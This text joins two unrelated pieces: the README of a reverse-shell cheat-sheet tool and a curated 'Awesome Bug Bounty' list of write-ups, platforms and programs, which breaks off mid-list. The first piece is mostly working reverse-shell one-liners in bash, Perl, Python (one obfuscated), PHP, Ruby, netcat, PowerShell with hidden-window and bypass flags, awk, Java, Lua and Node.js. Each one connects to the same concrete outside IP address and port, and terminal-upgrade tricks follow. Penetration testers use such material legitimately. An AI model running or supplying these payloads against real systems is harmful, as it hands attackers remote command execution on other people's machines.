.:: 0xR ::. .:: Reverse Shell Cheat Sheet Tool ::. .:: cyber-warrior.org ::. #Install Note Clone the repository: git clone https://github.com/0xR0/shellver.git Then go inside: cd shellver/ Then install it: python setup.py -i For reinstall python setup.py -r run shellver -h or "shellver msf {} shell {} spawn".format (or)โœ” #Example shellver shell <img src="https://github.com/0xR0/shellver/blob/master/ss/py.png" > shellver msf <img src="https://github.com/0xR0/shellver/blob/master/ss/all.png" > From https://github.com/swisskyrepo # Reverse Shell Methods ``` โ•”Bash TCPโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ bash -i >& /dev/tcp/171.25.193.25/1234 0>&1 โ•‘โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ 0<&196;exec 196<>/dev/tcp/171.25.193.25/1234; sh <&196 >&196 2>&196 โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”Bash UDPโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ Run Target Machine โ•‘ sh -i >& /dev/udp/171.25.193.25/1234 0>&1 โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฉโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”PERLโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ perl -e 'use Socket;$i="171.25.193.25";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"171.25.193.25:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ Windows only โ•‘ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"171.25.193.25:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”PYTHONโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("171.25.193.25",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("171.25.193.25",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('171.25.193.25', 1234)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\windows\system32\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”PHPโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ php -r '$sock=fsockopen("171.25.193.25",1234);exec("/bin/sh -i <&3 >&3 2>&3");' โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”RUBYโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ ruby -rsocket -e'f=TCPSocket.open("171.25.193.25",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ ruby -rsocket -e 'exit if fork;c=TCPSocket.new("171.25.193.25","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ Windows only โ•‘ ruby -rsocket -e 'c=TCPSocket.new("171.25.193.25","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”Netcat Traditionalโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ nc -e /bin/sh 171.25.193.25 1234 โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”Netcat OpenBsdโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 171.25.193.25 1234 >/tmp/f โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”NCATโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ ncat 171.25.193.25 1234 -e /bin/bash โ•‘โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ ncat --udp 171.25.193.25 1234 -e /bin/bash โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”POWERSHELLโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("171.25.193.25",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('171.25.193.25',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”AWKโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ awk 'BEGIN {s = "/inet/tcp/0/171.25.193.25/1234"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”JAWAโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/171.25.193.25/1234;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”LUAโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ Linux only โ•‘ lua -e "require('socket');require('os');t=socket.tcp();t:connect('171.25.193.25','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ Windows and Linux โ•‘ lua5.1 -e 'local host, port = "171.25.193.25", 1234 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”NODEJSโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(1234, "171.25.193.25", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application form crashing })(); โ•”โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ OR โ•‘ require('child_process').exec('nc -e /bin/sh 171.25.193.25 1234') โ•šโ•โ•โ•โ•โ•โ•ฉโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ OR โ•‘ -var x = global.process.mainModule.require -x('child_process').exec('nc 171.25.193.25 1234 -e /bin/bash') โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•”JAWA For GROOVYโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• โ•‘ String host="171.25.193.25"; int port=1234; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ• ``` # Spawn TTY ```bash /bin/sh -i ``` (From an interpreter) ```powershell python -c 'import pty; pty.spawn("/bin/sh")' perl -e 'exec "/bin/sh";' perl: exec "/bin/sh"; ruby: exec "/bin/sh" lua: os.execute('/bin/sh') ``` Access shortcuts, su, nano and autocomplete in a partially tty shell /!\ OhMyZSH might break this trick, a simple `sh` is recommended ```powershell # in host ctrl+z stty raw -echo fg # in reverse shell reset export SHELL=bash export TERM=xterm-256color stty rows <num> columns <cols> ``` (From within vi) ```bash :!bash :set shell=/bin/bash:shell ``` (From within nmap) ```sh !sh ``` ## Thanks to * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner) * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) * [Spawning a TTY Shell](http://netsec.ws/?p=337) * [Obtaining a fully interactive shell](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell)
# Awesome Bug Bounty [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) A comprehensive curated list of Bug Bounty Programs and write-ups from the Bug Bounty hunters. ## Table of Contents - [Getting Started](#getting-started) - [Write Ups & Authors](#write-ups--authors) - [Platforms](#platforms) - [Available Programs](#available-programs) - [Contribution guide](contributing.md) ### Getting Started - [How to Become a Successful Bug Bounty Hunter](https://hackerone.com/blog/what-great-hackers-share) - [Researcher Resources - How to become a Bug Bounty Hunter](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102) - [Bug Bounties 101](https://whitton.io/articles/bug-bounties-101-getting-started/) - [The life of a bug bounty hunter](http://www.alphr.com/features/378577/q-a-the-life-of-a-bug-bounty-hunter) - [Awsome list of bugbounty cheatsheets](https://github.com/EdOverflow/bugbounty-cheatsheet) - [Getting Started - Bug Bounty Hunter Methodology](https://blog.bugcrowd.com/getting-started-bug-bounty-hunter-methodology) ### Write Ups & Authors - [sakurity.com/blog](http://sakurity.com/blog) - by [Egor Homakov](https://twitter.com/homakov) - [respectxss.blogspot.in](http://respectxss.blogspot.in/) - by [Ashar Javed](https://twitter.com/soaj1664ashar) - [labs.detectify.com](http://labs.detectify.com/) - by [Frans Rosรฉn](https://twitter.com/fransrosen) - [cliffordtrigo.info](https://www.cliffordtrigo.info/) - by [Clifford Trigo](https://twitter.com/MrTrizaeron) - [stephensclafani.com](http://stephensclafani.com/) - by [Stephen Sclafani](https://twitter.com/Stephen) - [sasi2103.blogspot.co.il](http://sasi2103.blogspot.co.il/) - by [Sasi Levi](https://twitter.com/sasi2103) - [pwnsecurity.net](http://www.pwnsecurity.net/) - by [Shashank](https://twitter.com/cyberboyIndia) - [breaksec.com](https://www.breaksec.com/) - by [Nir Goldshlager](https://twitter.com/Nirgoldshlager) - [pwndizzle.blogspot.in](http://pwndizzle.blogspot.in/) - by [Alex Davies](https://twitter.com/pwndizzle) - [c0rni3sm.blogspot.in](http://c0rni3sm.blogspot.in/) - by [yappare](https://twitter.com/yappare) - [exploit.co.il/blog](http://exploit.co.il/blog/) - by [Shai rod](https://twitter.com/NightRang3r) - [ibreak.software](https://ibreak.software/) - by [Riyaz Ahemed Walikar](https://twitter.com/riyazwalikar) - [panchocosil.blogspot.in](http://panchocosil.blogspot.in/) - by [Francisco Correa](https://twitter.com/@panchocosil) - [breakingmesh.blogspot.in](http://breakingmesh.blogspot.in/) - by [Sahil Sehgal](https://twitter.com/xXSehgalXx) - [websecresearch.com](http://www.websecresearch.com/) - by [ Ajay Singh Negi](https://twitter.com/ajaysinghnegi) - [securitylearn.net](http://www.securitylearn.net/about/) - by [Satish Bommisetty](https://twitter.com/satishb3) - [secinfinity.net](http://www.secinfinity.net/) - by Prakash Sharma - [websecuritylog.com](http://www.websecuritylog.com/) - by [jitendra jaiswal](https://twitter.com/jeetjaiswal22) - [medium.com/@ajdumanhug](https://medium.com/@ajdumanhug) - by [Allan Jay Dumanhug](https://www.twitter.com/ajdumanhug) - [Web Hacking 101](https://leanpub.com/web-hacking-101) - by [Peter Yaworski](https://twitter.com/yaworsk) ### Platforms - [HackerOne](https://hackerone.com/) - [Bugcrowd](https://bugcrowd.com/) - [Cobalt](https://cobalt.io/) - [Bountysource](https://www.bountysource.com/) - [Bounty Factory](https://bountyfactory.io/) - [Coder Bounty](http://www.coderbounty.com/) - [FreedomSponsors](https://freedomsponsors.org/) - [FOSS Factory](http://www.fossfactory.org/) - [Synack](https://www.synack.com/) ### Available Programs - [123Contact Form](http://www.123contactform.com/security-acknowledgements.htm) - [99designs](https://hackerone.com/99designs) - [Abacus](https://bugcrowd.com/abacus) - [Acquia](mailto:[email protected]) - [ActiveCampaign](mailto:[email protected]) - [ActiveProspect](mailto:[email protected]) - [Adobe](https://hackerone.com/adobe) - [AeroFS](mailto:[email protected]) - [Airbitz](https://cobalt.io/airbitz) - [Airbnb](https://hackerone.com/airbnb) - [Algolia](https://hackerone.com/algolia) - [Altervista](http://en.altervista.org/feedback.php?who=feedback) - [Amara](mailto:[email protected]) - [Amazon Web Services](mailto:[email protected]) - [Amazon.com](mailto:[email protected]) - [ANCILE Solutions Inc.](https://bugcrowd.com/ancile) - [Anghami](https://hackerone.com/anghami) - [ANXBTC](https://cobalt.io/anxbtc) - [Apache httpd](https://hackerone.com/ibb-apache) - [Appcelerator](mailto:[email protected]) - [Apple](mailto:[email protected]) - [Apptentive](https://www.apptentive.com/contact) - [Aptible](mailto:[email protected]) - [Ardour](http://tracker.ardour.org/my_view_page.php) - [ARM mbed](mailto:[email protected]) - [Asana](mailto:[email protected]) - [ASP4all](mailto:[email protected]) - [AT&T](https://bugbounty.att.com/bugform.php) - [Atlassian](https://securitysd.atlassian.net/servicedesk/customer/portal/2) - [Attack-Secure](mailto:[email protected]) - [Authy](mailto:[email protected]) - [Automattic](https://hackerone.com/automattic) - [Avast!](mailto:[email protected]) - [Avira](mailto:[email protected]) - [AwardWallet](https://cobalt.io/awardwallet) - [Badoo](https://corp.badoo.com/en/security/#send_bid) - [Barracuda](https://bugcrowd.com/barracuda) - [Basecamp](mailto:[email protected]) - [Beanstalk](https://wildbit.wufoo.com/forms/wildbit-security-response) - [BillGuard](https://cobalt.io/billguard) - [Billys Billing](https://cobalt.io/billys-billing) - [Binary.com](https://hackerone.com/binary) - [Binary.com Cashier](https://hackerone.com/binary_cashier) - [BitBandit.eu](https://cobalt.io/bitbandit-eu) - [Bitcasa](mailto:[email protected]) - [BitCasino](https://cobalt.io/bitcasino) - [BitGo](https://cobalt.io/bitgo) - [BitHealth](https://cobalt.io/bithealth) - [BitHunt](https://hackerone.com/bithunt) - [BitMEX](https://cobalt.io/bitmex) - [Bitoasis](https://cobalt.io/bitoasis) - [Bitpagos](https://cobalt.io/bitpagos) - [Bitrated](https://cobalt.io/bitrated) - [Bitreserve](https://cobalt.io/bitreserve) - [Bitspark](https://cobalt.io/bitspark) - [Bitwage](https://cobalt.io/bitwage) - [BitWall](mailto:[email protected]) - [BitYes](https://cobalt.io/bityes) - [BlackBerry](https://global.blackberry.com/secure/report-an-issue/en.html) - [Blackboard](mailto:[email protected]) - [Blackphone](https://bugcrowd.com/blackphone) - [Blesta](mailto:[email protected]) - [Block.io](https://hackerone.com/blockio) - [Block.io, Inc.](https://cobalt.io/block-io-inc) - [Blockchain.info](https://cobalt.io/blockchain-info) - [BlockScore](https://cobalt.io/blockscore) - [Bookfresh](https://hackerone.com/bookfresh) - [Box](mailto:[email protected]) - [Braintree](mailto:[email protected]) - [BTC_sx](https://cobalt.io/btc-sx) - [Buffer](mailto:[email protected]) - [BX.in.th](https://cobalt.io/bx-in-th) - [C2FO](https://hackerone.com/c2fo) - [Campaign Monitor](https://help.campaignmonitor.com/contact) - [CARD.com](https://bugcrowd.com/card) - [Catchafire](https://cobalt.io/catchafire) - [Caviar](https://hackerone.com/caviar) - [CCBill](mailto:[email protected]) - [CERT/CC](https://hackerone.com/cert) - [Certly](https://hackerone.com/certly) - [ChainPay](https://cobalt.io/chainpay) - [ChangeTip](https://cobalt.io/changetip) - [Chargify](https://bugcrowd.com/chargify) - [Chromium Project](https://code.google.com/p/chromium/issues/entry?template=Security%20Bug) - [Circle](https://cobalt.io/circle) - 